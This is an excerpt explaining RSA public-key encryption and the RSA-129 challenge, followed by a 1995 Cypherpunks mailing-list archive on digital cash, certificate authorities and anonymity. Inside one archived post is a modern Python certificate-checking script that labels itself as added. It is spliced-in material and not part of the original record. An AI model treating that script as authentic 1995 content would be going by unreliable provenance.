The sort of one-way function required for cryptography is one that is easy to undo if you know an extra piece of information and very difficult to undo without that information. There are a number of such one-way functions in mathematics. One involves prime numbers. Kids learn about prime numbers in school. A prime number cannot be divided evenly by any number except 1 and itself. Among the first dozen numbers, the primes are 2, 3, 5, 7, and 11. The numbers 4, 6, 8, and 10 are not prime because 2 divides into each of them evenly. The number 9 is not prime because 3 divides into it evenly. There are an infinite number of prime numbers, and there is no known pattern to them except that they are prime. When you multiply two prime numbers together, you get a number that can be divided evenly only by those same two primes. For example, only 5 and 7 can be divided evenly into 35. Finding the primes is called "factoring" the number. It is easy to multiply the prime numbers 11,927 and 20,903 and get the number 249,310,081, but it is much harder to recover from the product, 249,310,081, the two prime numbers that are its factors. This one-way function, the difficulty of factoring numbers, underlies an ingenious kind of cipher: the most sophisticated encryption system in use today. It takes a long time for even the largest computers to factor a really large product back into its constituent primes. A coding system based on factoring uses two different decoding keys, one to encipher a message and a different but related one to decipher. With only the enciphering key, it's easy to encode a message, but deciphering it within any practical period of time is nearly impossible. Deciphering requires a separate key, available only to the intended recipient of the message -- or, rather, to the recipient's computer. The enciphering key is based on the product of two huge prime numbers, whereas the deciphering key is based on the primes themselves.
A computer can generate a new pair of unique keys in a flash, because it is easy for a computer to generate two large prime numbers and multiply them together. The enciphering key thus created can be made public without appreciable risk, because of the difficulty even another computer would have factoring it to obtain the deciphering key. The practical application of this encryption will be at the center of the information highway's security system. The world will become quite reliant on this network, so it is important that security be handled competently. You can think of the information highway as a postal network where everyone has a mailbox that is impervious to tampering and has an unbreakable lock. Each mailbox has a slot that lets anyone slide information in, but only the owner of a mailbox has the key to get information out. (Some governments may insist that each mailbox have a second door with a separate key that the government keeps, but we'll ignore that political consideration for now and concentrate on the security that software will provide.) Each user's computer or other information appliance will use prime numbers to generate an enciphering key, which will be listed publicly, and a corresponding deciphering key, which only the user will know. This is how it will work in practice: I have information I want to send you. My information appliance/computer system looks up your public key and uses it to encrypt the information before sending it. No one can read the message, even though your key is public knowledge, because your public key does not contain the information needed for decryption. You receive the message and your computer decrypts it with a private key that corresponds to your public key. You want to answer. Your computer looks up my public key and uses it to encrypt your reply. No one else can read the message, even though it was encrypted with a key that is totally public. Only I can read it because only I have the private deciphering key. 
This is very practical, because no one has to trade keys in advance. How big do the prime numbers and their products have to be to ensure an effective one-way function? The concept of public-key encryption was invented by Whitfield Diffie and Martin Hellman in 1977. Another set of computer scientists, Ron Rivest, Adi Shamir, and Leonard Adleman, soon came up with the notion of using prime factorization as part of what is now known as the RSA cryptosystem, after the initials of their last names. They projected that it would take millions of years to factor a 130-digit number that was the product of two primes, regardless of how much computing power was brought to bear. To prove the point, they challenged the world to find the two factors in this 129-digit number, known to people in the field as RSA 129:

114,381,625,757,888,867,669,235,779,976,146,612,010,
218,296,721,242,362,562,561,842,935,706,935,245,733,
897,830,597,123,563,958,705,058,989,075,147,599,290,
026,879,543,541

They were sure that a message they had encrypted using the number as the public key would be totally secure forever. But they hadn't anticipated either the full effects of Moore's Law, as discussed in chapter 2, which has made computers much more powerful, or the success of the personal computer, which has dramatically increased the number of computers and computer users in the world. In 1993 a group of more than 600 academics and hobbyists from around the world began an assault on the 129-digit number, using the Internet to coordinate the work of various computers. In less than a year they factored the number into two primes, one 64 digits long and the other 65. The primes are as follows:

3,490,529,510,847,650,949,147,849,619,903,898,133,
417,764,638,493,387,843,990,820,577

and

32,769,132,993,266,709,549,961,988,190,834,461,413,
177,642,967,992,942,539,798,288,533

And the encoded message says: "The magic words are squeamish and ossifrage."
One lesson that came out of this challenge is that a 129-digit public key is not long enough if the information being encrypted is really important and sensitive. Another is that no one should get too cocksure about the security of encryption. Increasing the key just a few digits makes it much more difficult to crack. Mathematicians today believe that a 250-digit-long product of two primes would take millions of years to factor with any foreseeable amount of future computing power. But who really knows? This uncertainty -- and the unlikely but conceivable possibility that someone could come up with an easy way of factoring big numbers -- means that a software platform for the information highway will have to be designed in such a way that its encryption scheme can be changed readily. One thing we don't have to worry about is running out of prime numbers, or the prospect of two computers' accidentally using the same numbers as keys. There are far more prime numbers of appropriate length than there are atoms in the universe, so the chance of an accidental duplication is vanishingly small. Key encryption allows more than just privacy. It can also assure the authenticity of a document because a private key can be used to encode a message that only the public key can decode. It works like this: If I have information I want to sign before sending it to you, my computer uses my private key to encipher it. Now the message can be read only if my public key -- which you and everyone else knows -- is used to decipher it. This message is verifiably from me, because no one else has the private key that could have encrypted it in this way. My computer takes this enciphered message and enciphers it again, this time using your public key. Then it sends this double-coded message to you across the information highway. Your computer receives the message and uses your private key to decipher it. 
This removes the second level of encoding but leaves the level I applied with my private key. Then your computer uses my public key to decipher the message again. Because it really is from me, the message deciphers correctly and you know it is authentic. If even one bit of information was changed, the message would not decode properly and the tampering or communications error would be apparent. This extraordinary security will enable you to transact business with strangers or even people you distrust, because you'll be able to be sure that digital money is valid and signatures and documents are provably authentic. Security can be increased further by having time stamps incorporated into encrypted messages. If anyone tries to tinker with the time that a document supposedly was written or sent, the tinkering will be detectable. This will rehabilitate the evidentiary value of photographs and videos, which has been under assault because digital retouching has become so easy to do. My description of public-key encryption oversimplifies the technical details of the system. For one thing, because it is relatively slow, it will not be the only form of encipherment used on the highway. But public-key encryption will be the way that documents are signed, authenticity is established, and the keys to other kinds of encryption are distributed securely.

[Critical Issues, pp. 265-66, 270-71]

This versatility will be the strength of the network, but it will also mean we will become reliant on it. Reliance can be dangerous. During the New York City blackouts in 1965 and 1977, millions of people were in trouble -- at least for a few hours -- because of their dependence on electricity. They counted on electric power for light, heat, transport, and security. When electricity failed, people were trapped in elevators, traffic lights stopped working, and electric water pumps quit. Anything really useful is missed when you lose it.
A complete failure of the information highway is worth worrying about. Because the system will be thoroughly decentralized, any single outage is unlikely to have a widespread effect. If an individual server fails, it will be replaced and its data restored. But the system could be susceptible to assault. As the system becomes more important, we will have to design in more redundancy. One area of vulnerability is the system's reliance on cryptography -- the mathematical locks that keep information safe. None of the protection systems that exist today, whether steering-wheel locks or steel vaults, are completely fail-safe. The best we can do is make it as difficult as possible for somebody to break in. Despite popular opinions to the contrary, computer security has a very good record. Computers are capable of protecting information in such a way that even the smartest hackers can't get at it readily unless someone entrusted with information makes a mistake. Sloppiness is the main reason computer security gets breached. On the information highway there will be mistakes, and too much information will get passed along. Someone will issue digital concert tickets that prove to be forgeable, and too many people will show up. Whenever this sort of thing happens, the system will have to be reworked and laws may have to be revised. Because both the system's privacy and the security of digital money depend on encryption, a breakthrough in mathematics or computer science that defeats the cryptographic system could be a disaster. The obvious mathematical breakthrough would be development of an easy way to factor large prime numbers. Any person or organization possessing this power could counterfeit money, penetrate any personal, corporate, or governmental file, and possibly even undermine the security of nations, which is why we have to be so careful in designing the system.
We have to ensure that if any particular encryption technique proves fallible, there is a way to make an immediate transition to an alternate technique. There's a little bit of inventing still to be done before we have that perfected. It is particularly hard to guarantee security for information you want kept private for a decade or more. [Good section on privacy protection elided] At the same time technology is making it easier to create video records, it is also making it possible to keep all your personal documents and messages totally private. Encryption-technology software, which anyone can download from the Internet, can transform a PC into a virtually unbreakable code machine. As the highway is deployed, security services will be applied to all forms of digital information -- phone calls, files, databases, you name it. As long as you protect the password, the information stored on your computer can be held under the strongest lock and key that has ever existed. This allows for the greatest degree of information privacy any individual has ever had. Many in government are opposed to this encryption capability, because it reduces their ability to gather information. Unfortunately for them, the technology can't be stopped. The National Security Agency is a part of the U.S. government defense and intelligence community that protects this country's secret communications and decrypts foreign communications to gather intelligence data. The NSA does not want software containing advanced encryption capabilities to be sent outside the United States. However, this software is already available throughout the world, and any computer can run it. No policy decision will be able to restore the tapping capabilities governments had in the past. Today's legislation that prevents the export of software with good encryption capability could harm U.S. software and hardware companies. The restrictions give foreign companies an advantage over U.S. competitors. 
American companies almost unanimously agree that the current encryption export restrictions don't work.

-----

From nobody at REPLAY.COM Sat Nov 25 08:07:09 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 26 Nov 1995 00:07:09 +0800
Subject: Money: Back to the Future?
Message-ID: <199511250137.CAA12316@utopia.hacktic.nl>

Wall Street Journal, Nov 23, 1995.

Money: Back to the Future?

By Walter Wriston (Former chairman of Citicorp)

Americans are about to begin using a new kind of money that may have consequences for the Federal Reserve's control of the money supply and almost certainly for the velocity of money. Over the years, people have used all kinds of things for money, from the huge immovable stones in the front yards of the residents of Yap Island to the more familiar silver and gold. All these various mediums of exchange will now be joined in our country by the "smart" card -- a piece of plastic embedded with a microchip. Smart cards combine features of the following: automatic teller machine cards that let you access your bank account and draw cash; MasterCard or Visa cards that permit you to buy now and pay later; and debit cards that charge an account at the time of purchase. Not only can smart cards do all of the above but they can also serve as an "electronic purse" independent of your bank account. These cards contain real money that can be spent at stores and restaurants. In effect, the card is an electronic traveler's check, but one that makes exact change. In addition, the integrated circuit chip allows a higher degree of security for the information stored than do the current magnetic strip cards. Smart cards are common in Europe and Asia, where some 400 million were shipped last year. The first large-scale use of smart cards in this country will occur next year at the Summer Olympics in Atlanta. Plans call for 300,000 rechargeable cards, and 700,000 disposable cards in denominations of $25, $50 and $100.
These cards would fit nicely into the payment habits of Americans, since in the U.S. it is estimated that 88% of transactions are done by cash or check, and of these 83% are for less than $10. In Atlanta, electronic "purse cards," which contain stored value, could be spent at pay phones or vending machines. When their stored value is exhausted, they are thrown away. The smart cards, by contrast, can be taken back to the issuer and recharged. Their broad issuance and use could return America to something very close to the free banking of the last century, when every commercial bank issued dollar bills, backed sometimes by the skill of the management, sometimes by doubtful state bonds and sometimes by gold or silver. We have grown so accustomed to the familiar Federal Reserve note that many forget that Americans had no central bank for about 75 years -- from 1836, when President Jackson vetoed the bill to renew the charter of the Second Bank of the United States, to the start of World War I, when the Federal Reserve Act was passed. After the passage by New York state of the Free Banking Act in 1838, the idea of state-chartered banks spread across the country, and each commercial bank issued its own dollar bills of various shapes and sizes. This does not mean that the 19th century witnessed complete currency chaos. In 1863, the National Bank Act was passed to create a market in the government bonds needed to finance the Civil War and to bring some order to the private issuance of currency. The act required that bank notes issued by commercial banks be uniform in appearance and that they be backed by collateral consisting of U.S. Treasury securities. As the old Civil War bonds were paid off, the currency base of the country declined some 60% from 1881 to 1890. This inflexible system led to panics and instability. To a certain extent, the Treasury Department during this time assumed some of the functions of a central bank. 
All during this period a debate raged, not about whether America needed a central bank but about "free silver" and the price at which the Treasury would buy gold and silver. It was not until the eve of World War I that passage of the Federal Reserve Act finally gave the U.S. government a monopoly on the creation of money. Now we may be going back to the future. The advent of smart cards means that the Fed will lose its monopoly on issuing currency, except that this time the new money will be issued not only by banks but by all kinds of companies, from convenience stores to telephone companies. Nor is this the only trend threatening the Fed's monopoly: Information technology is about to permit the creation of both electronic token money and cash money in cyberspace. Already we have Digi Cash in Amsterdam reviving in modern guise something very close to the old American free-banking system -- issuing electronic money (backed by some depository bank holding collateral in the form of Treasury securities) and performing the clearing function. None of this is necessarily a cause for panic. There is very little, if any, evidence that government has managed our currency values any better than the commercial banks did in pre-Fed days. Indeed, the Nobel laureate economist F.A. Hayek put it more strongly: "The history of government management of money has, except for a few short happy periods, been one of incessant fraud and deception." Still these new trends do present worries for central bankers. If more and more firms issue cards for cash or credit, what will be the effect on the velocity of money? How will central banks form policies on the control of the money supply if any company can issue electronic purse cards on credit, with or without collateral? What will happen if the issuer of the card goes broke? As smart cards become more visible in America, regulators and governments will begin to wonder about control of money and credit. 
The European system of central banks has produced an advisory report outlining a possible regulatory response, and in this country some Fed officials are starting to wonder if their regulations will be applicable. If one definition of money is an object that has no use except to be given to someone else in exchange for goods or services, smart cards are money -- and they are coming to your neighborhood soon. ----- From perry at piermont.com Sat Nov 25 08:57:25 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 26 Nov 1995 00:57:25 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: Message-ID: <199511251650.LAA01055@jekyll.piermont.com> Aleph One writes: > Since now Netscape allows for user defined certification authorities > I would like to hear some ideas for a Cypherpunk CA. Probably run by one > of the respected members in the group such as Sameer, Perry or Tim. I would > like to hear some discussion about creating the certificates based on > the web of trust of your PGP key, etc. Any takers? Hmmm. If someone is willing to find out what is needed to become a C.A. and to run one, and it turns out not to be particularly onerous, I or one of my corporate alter egos might be willing. I must say, though, that being an anti-fan of X.509 the situation would be ironic... Perry From sameer at c2.org Sat Nov 25 09:45:59 1995 From: sameer at c2.org (sameer) Date: Sun, 26 Nov 1995 01:45:59 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: <199511251650.LAA01055@jekyll.piermont.com> Message-ID: <199511251732.JAA15922@infinity.c2.org> > though, that being an anti-fan of X.509 the situation would be ironic... > > Perry Speaking of ironic situations, my sister recently mentioned that her fiancee is a good friend of Jim Bidzos and asked me if I wanted a job with RSADSI. If I wasn't planning on leaving the employed-by-others arena I would have seriously considered it. ;-) In terms of being a CA. 
I have considered making Community COnneXion a CA for its customers, but I haven't done much research into what is involved in doing that. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From s1113645 at tesla.cc.uottawa.ca Sat Nov 25 10:24:18 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sun, 26 Nov 1995 02:24:18 +0800 Subject: ecash protocol: living in denial In-Reply-To: <199511250744.SAA14637@sweeney.cs.monash.edu.au> Message-ID: On Sat, 25 Nov 1995, Jiri Baum wrote: > > - Ian "Why exactly isn't DigiCash releasing the protocol? What about > > the source?" > ... > > A Source Close To Digicash That Did Not Wish To Be Quoted > once described them as 'crown jewels' (competitive advantage). Can you say RC4? > > ASCTDTDNWTBQ then appealed to Digicash's track record. > > I certainly hope that this genuinely is not Digicash's official opinion. Heh. Can you say RSADSI? (or Ron Rivest? Or NSA on Mr. Blaze's bogus LEAFs? Need I say Elementrix non-algorithmic POTP?) They were lucky Rivest's a decent cryptographer. (which reminds me, what's the current list of "secure" block ciphers, besides for des and idea? what's been analyzed or weakened lately? I'm too broke to get Schneier's 2nd ed. to check.) > Thank you for once again showing the futility of security by obscurity. As Ian himself is demonstrating. From loki at obscura.com Sat Nov 25 10:41:24 1995 From: loki at obscura.com (Lance Cottrell) Date: Sun, 26 Nov 1995 02:41:24 +0800 Subject: [rehash] Re: crypto for porno users Message-ID: At 6:05 PM 11/24/95, s1113645 at tesla.cc.uottawa.ca wrote: >Watch the cpunks go round and round and round and... > >On Fri, 24 Nov 1995, Gary Jeffers wrote: > >> I know little of the theory of Dining Cryptographers but I would think >> that a good implementation of it would make infiltrators useless. 
I will >> leave it for other Cypherpunks to discuss the mechanics (specific and >> general) for actually doing this. > >Dining Cryptographers nets (aka DC-nets) are the whole idea behind the >type 2 anon remailers like Mixmaster, and the remailernet in general. >You'll find a lot on this in the archives, the ftp site (which has Chaum's >DC article and a good explanation by Tim May) and a few peoples' pages. >(I think they're mostly pointed to in the pages I list) > I wish this were the case. Mixmaster is not based on the "Dining Cryptographers" problem, but based on Chaum's "Digital Mixes". Digital mixes hide the fact that A is communicating with B. DC nets allow an individual A in a group of people A' to send a message so that it is impossible to tell who in the group sent it (but it is known to have been one of the members of A'). -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From andreas at artcom.de Sat Nov 25 11:03:26 1995 From: andreas at artcom.de (Andreas Bogk) Date: Sun, 26 Nov 1995 03:03:26 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: <199511251650.LAA01055@jekyll.piermont.com> Message-ID: >>>>> "Perry" == Perry E Metzger writes: Perry> become a C.A. and to run one, and it turns out not to be Perry> particularly onerous, I or one of my corporate alter egos Perry> might be willing. I must say, though, that being an Perry> anti-fan of X.509 the situation would be ironic... ;). Ten easy steps to become a C.A.:
1. get a copy of SSLeay (try ftp://ftp.cert.dfn.de/pub/tools/net/ssleay)
2. install it
3. generate a key using 'genrsa -idea -rand /dev/random:/var/adm/messages:/etc/utmp:/proc/net/dev -out cypherpunks.key 1024'. Substitute a higher number than 1024 depending on your paranoia. Choose an inconvenient pass phrase.
4. Use your favourite secret splitting method and send key and pass phrase to respected members of the cypherpunks community.
5. Generate your X.509 certificate using makecert.
6. Sign other people's certificate using x509.
7.-10. Get yourself a decent beer and Applied Cryptography 2nd Ed.
Sorry, I'd love to give you details for 5 and 6, but I'm out of time. I'll deliver them tomorrow. Andreas From carolann at censored.org Sat Nov 25 12:19:58 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Sun, 26 Nov 1995 04:19:58 +0800 Subject: PGP Distribution Site at MIT *DOWN* Message-ID: <199511252011.NAA01255@mailhost1.primenet.com> On Sat Nov 25th, 1995: >We apologize for the inconvenience and hope to have full service >restored shortly. > -Jeff Can you PLEASE put the .org permissions back in it! Thanks ever so much. censored.org can't get in. Love Always, Carol Anne -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- http://dcs.ex.ac.uk/~aba/export/ From froomkin at law.miami.edu Sat Nov 25 12:29:09 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Sun, 26 Nov 1995 04:29:09 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: Message-ID: Alas, certain critical social steps have been elided in the proposed protocol. As it happens, I'm working on an article, to be published in the Oregon Law Review next year, on "The Importance of Trusted Third Parties in Electronic Commerce". It's mostly about the care and feeding (and legal liability!) of a CA. Unfortunately for this discussion, I'm only part way through my thinking about what the liability of a CA might be so I don't have carefully considered conclusions to offer you. Try me again in a few weeks. In the absence of legislation... [PLUG: if you haven't already done so, RUSH to my homepage http://www.law.miami.edu/~froomkin and click on the link to the ABA draft of the digital signature guidelines. This mis-named document is actually all about CA liability. Comment period now extended to mid-January.] ...you need to worry about who might *use* the certificates, and what they might do to the CA in the case of mis-certification or other misfortune. 
At the very least, there is a tort claim for "negligent mis-representation" the first time an inaccurate certificate, or an accurate certificate referencing a compromised key, is used in a transaction that goes sour. I don't give legal advice on line, ever, so I can't tell you how to avoid liability. I'm not even sure that this is possible absent legislation. I can, however, mention techniques that at this writing seem to me to be an essential part of any liability-reduction strategy, without any claim that these alone suffice to protect you to the level that I would want to be protected (I'm a cautious guy). Repeat: I do claim that pending further thought these steps seem necessary, **not** that they are sufficient:
A) Establish a clear certification policy document, describing in detail what checks are made before issuing a certificate, how quickly CRLs are posted, and where. This doesn't mean onerous checks are necessary, just that you need to be clear as to what checking a certificate from you embodies. Publish this document.
B) Reference this policy document in every certificate.
C) Don't settle for less than X.509 ver 3, because this allows the certificate to carry within it a reference to the location of the CRL list. Use that feature.
D) Establish a very reliable mechanism to ensure CRLs are posted where and when they should be.
E) Use a secure, trusted, computer system.
Again, I note that this is NOT a complete list of what you need to do. For more inspiration consult the ABA document referenced above. A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. 
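Points B and C of the list above, seen from the relying party's side, as an added example that is not part of the original message: a small DER walker that checks whether a certificate body is X.509 v3 and carries a certificatePolicies reference and a cRLDistributionPoints location. The unsigned certificate skeleton, the 2.999.1 policy OID and the ca.example.org URLs are constructed for the demonstration.

```python
# Added example, not from the original post; the 2.999.1 policy OID and
# the ca.example.org URLs used with it are constructed placeholders.
OID_CRL_DP = "2.5.29.31"         # id-ce-cRLDistributionPoints
OID_CERT_POLICIES = "2.5.29.32"  # id-ce-certificatePolicies
OID_CPS = "1.3.6.1.5.5.7.2.1"    # id-qt-cps: URI of the policy document

def tlv(tag, content=b""):
    n = len(content)             # DER definite length: short or long form
    if n < 0x80:
        return bytes([tag, n]) + content
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(raw)]) + raw + content

def seq(*items):
    return tlv(0x30, b"".join(items))

def oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    body = b""
    for sub in [40 * arcs[0] + arcs[1]] + arcs[2:]:
        chunk = bytes([sub & 0x7F])
        sub >>= 7
        while sub:
            chunk = bytes([0x80 | (sub & 0x7F)]) + chunk
            sub >>= 7
        body += chunk
    return tlv(0x06, body)

WANTED = {oid(OID_CERT_POLICIES)[2:]: "policy_uris", oid(OID_CRL_DP)[2:]: "crl_uris"}

def read_tlv(buf, pos=0):
    """Return (tag, content, next_pos); raise ValueError on malformed DER."""
    if pos + 2 > len(buf):
        raise ValueError("truncated DER")
    tag, n, pos = buf[pos], buf[pos + 1], pos + 2
    if n & 0x80:                                   # long-form length
        k = n & 0x7F
        if k == 0:
            raise ValueError("indefinite length is not DER")
        n, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    if pos + n > len(buf):
        raise ValueError("truncated DER")
    return tag, buf[pos:pos + n], pos + n

def children(content):
    out, pos = [], 0
    while pos < len(content):
        tag, body, pos = read_tlv(content, pos)
        out.append((tag, body))
    return out

def find_uris(der):
    """Collect URI [6] and IA5String values nested anywhere inside der."""
    uris = []
    for tag, body in children(der):
        if tag & 0x20:                             # constructed: descend
            uris += find_uris(body)
        elif tag in (0x86, 0x16):
            uris.append(body.decode("ascii"))
    return uris

def lint_tbs(tbs_der):
    """Check a tbsCertificate for v3, a policy reference and a CRL location."""
    fields = children(read_tlv(tbs_der)[1])
    report = {"version": 1, "policy_uris": [], "crl_uris": []}  # v1 if [0] absent
    if fields and fields[0][0] == 0xA0:
        report["version"] = int.from_bytes(read_tlv(fields[0][1])[1], "big") + 1
    for tag, body in fields:
        if tag == 0xA3:                            # [3] EXPLICIT Extensions
            for _, ext in children(read_tlv(body)[1]):
                parts = children(ext)              # extnID, [critical], extnValue
                key = WANTED.get(parts[0][1])
                if key:
                    report[key] = find_uris(parts[-1][1])
    checks = [(report["version"] >= 3, "not X.509 v3"),
              (report["policy_uris"], "no certification policy reference"),
              (report["crl_uris"], "no CRL location")]
    report["problems"] = [msg for ok, msg in checks if not ok]
    return report

def extension(ext_oid, value_der):
    return seq(oid(ext_oid), tlv(0x04, value_der))  # extnValue: OCTET STRING
def crl_dp(uri):  # distributionPoint [0] { fullName [0] { URI [6] } }
    return extension(OID_CRL_DP, seq(seq(tlv(0xA0, tlv(0xA0, tlv(0x86, uri.encode()))))))
def cert_policies(policy_oid, cps_uri):
    qualifier = seq(oid(OID_CPS), tlv(0x16, cps_uri.encode()))  # CPSuri IA5String
    return extension(OID_CERT_POLICIES, seq(seq(oid(policy_oid), seq(qualifier))))

def sample_tbs(version, extensions):
    """Constructed, unsigned tbsCertificate skeleton (empty names, no key bits)."""
    null = tlv(0x05)
    fields = [tlv(0xA0, tlv(0x02, bytes([version - 1])))] if version > 1 else []
    fields += [tlv(0x02, b"\x01"), seq(oid("1.2.840.113549.1.1.4"), null), seq(),
               seq(tlv(0x17, b"951125000000Z"), tlv(0x17, b"961125000000Z")), seq(),
               seq(seq(oid("1.2.840.113549.1.1.1"), null), tlv(0x03, b"\x00"))]
    if extensions:
        fields.append(tlv(0xA3, seq(*extensions)))
    return seq(*fields)
```

Calling lint_tbs(sample_tbs(1, [])) reports all three problems, since a v1 certificate has no extensions field in which either pointer could be carried.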
From aleph1 at dfw.net Sat Nov 25 12:33:08 1995 From: aleph1 at dfw.net (Aleph One) Date: Sun, 26 Nov 1995 04:33:08 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: <199511251650.LAA01055@jekyll.piermont.com> Message-ID: On Sat, 25 Nov 1995, Perry E. Metzger wrote: > Hmmm. If someone is willing to find out what is needed to become a > C.A. and to run one, and it turns out not to be particularly onerous, > I or one of my corporate alter egos might be willing. I must say, > though, that being an anti-fan of X.509 the situation would be ironic... > > Perry Well from Netscape perspective as far as I know you need nothing. Basically when the browser finds a new CA that it does know about it prompts the user and through a series of dialog boxes the user chooses to trust it or not. (Well that is theory, and what netscape release notes say, since I don't have access to an SSL server right now, and would need to figure out how to make my own certificate, I haven't tried it). Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From aleph1 at dfw.net Sat Nov 25 12:51:44 1995 From: aleph1 at dfw.net (Aleph One) Date: Sun, 26 Nov 1995 04:51:44 +0800 Subject: Cypherpunk Certification Authority Message-ID: Since now Netscape allows for user defined certification authorities I would like to hear some ideas for a Cypherpunk CA. Probably run by one of the respected members in the group such as Sameer, Perry or Tim. I would like to hear some discussion about creating the certificates based on the web of trust of your PGP key, etc. Any takers? 
Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From adam at lighthouse.homeport.org Sat Nov 25 13:09:38 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Sun, 26 Nov 1995 05:09:38 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: Message-ID: <199511252105.QAA08724@homeport.org> | C) Don't settle for less than X.509 ver 3, because this allows the | certificate to carry within it a reference to the location of the CRL | list. Use that feature. Does X.509 version 3 fix the problem that Ross Anderson points out in his 'Robustness Principles' paper? (Crypto '95 proceedings, or ftp.cl.cam.ac.uk/users/rja14/robustness.ps.Z) It's an excellent paper, well worth reading, but the basic problem is that X.509 encrypts before signing. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From moroni at scranton.com Sat Nov 25 13:32:40 1995 From: moroni at scranton.com (Moroni) Date: Sun, 26 Nov 1995 05:32:40 +0800 Subject: crypto for porno users In-Reply-To: <01HY1C15AVLC8WYI84@mbcl.rutgers.edu> Message-ID: I'm sorry but I don't care if the images come from Mars. Jerking off to the images of kids is sick. From cp at proust.suba.com Sat Nov 25 13:48:21 1995 From: cp at proust.suba.com (Alex Strasheim) Date: Sun, 26 Nov 1995 05:48:21 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: Message-ID: <199511252135.PAA01435@proust.suba.com> > Basically when the browser finds a new CA that it does know about it prompts > the user and through a series of dialog boxes the user chooses to trust it > or not. Is anyone running an ssl web server that would let us see how this works? 
From ahupp at primenet.com Sat Nov 25 15:07:41 1995 From: ahupp at primenet.com (Adam Hupp) Date: Sun, 26 Nov 1995 07:07:41 +0800 Subject: Cypherpunks article in The Nando Times Message-ID: <199511252256.PAA05780@usr1.primenet.com> Check out http://www.nando.net/newsroom/ntn/info//101095/info446_33.html It's an article about the cypherpunks, mostly bullshit and hyperbole. I especially liked the parts about "Larry Detweiler" and this quote from Jim Kallston, of the FBI: "We're not trying to stop technology," Kallston said. "We're trying to collect information on criminals and terrorists and child pornographers." What happened to the fourth horseman Jim? From jya at pipeline.com Sat Nov 25 15:14:35 1995 From: jya at pipeline.com (John Young) Date: Sun, 26 Nov 1995 07:14:35 +0800 Subject: SAC_lam Message-ID: <199511252302.SAA20929@pipe4.nyc.pipeline.com> 11-25-95. Washrag: "Hacking Away at the Internet's Web. Security Concerns Grow as Saboteurs Target On-Line Sites." Computer hackers are turning their unwelcome attentions to the World Wide Web. Web sites are among the easiest places on the Internet to disrupt and sabotage, experts say, in part because many of the people who set up such displays pay little attention to security. Such unprotected systems located outside of a secure network are often called "sacrificial lambs," noted a manager at Trusted Information Systems Inc. SAC_lam (8 kb) From jya at pipeline.com Sat Nov 25 15:15:26 1995 From: jya at pipeline.com (John Young) Date: Sun, 26 Nov 1995 07:15:26 +0800 Subject: NOF_uss Message-ID: <199511252301.SAA20824@pipe4.nyc.pipeline.com> Science, Nov 17, 1995: "Security Schemes Aspire to No Fuss System Protection." 
Because of the painful trade offs between security and usability that come with current protective measures, computer scientists have been investigating new ways to detect and ward off intruders that present fewer obstacles to users and administrators. Two of the most intriguing directions announced at the Baltimore security conference were reported by researchers at Purdue University's Computer Operations, Audit, and Security Technology laboratory (COAST). The first was an attempt to harness techniques from artificial intelligence to detect intrusions; the second, a pilot test of what has been called software forensics -- an effort to recognize malign programs by identifying the fingerprints of their creators. NOF_uss (15 kb) From norm at netcom.com Sat Nov 25 15:50:13 1995 From: norm at netcom.com (Norman Hardy) Date: Sun, 26 Nov 1995 07:50:13 +0800 Subject: Learning Elliptic Curves Message-ID: I have found an easy introduction to elliptic curves. It is "Rational Points on Elliptic Curves" by Joseph H. Silverman & John Tate. (Springer-Verlag ISBN: 0-387-97825-9 or 3-540-97825-9) It is a breezy undergraduate introduction. It emphasizes the mathematical elegance. It mentions crypto applications but does not delve deeply. Schneier recommends "Elliptic Curve Public Key Cryptosystems" by Alfred J. Menezes. (Kluwer Academic Publishers ISBN: 0-7923-9368-6) That book has only a very compressed theory section which already requires knowledge of field theory. I think that the first book is a good intro to the second, which does cover crypto applications. What I learned is that elliptic curves are an alternative to finite fields for crypto purposes. Here is what they have in common: There are many (2^70 -- 2^2000) values any one of which can be represented in the machine in constant space. a_i is the ith one of these values. If someone sends you a_i it is real hard to figure out what i is. 
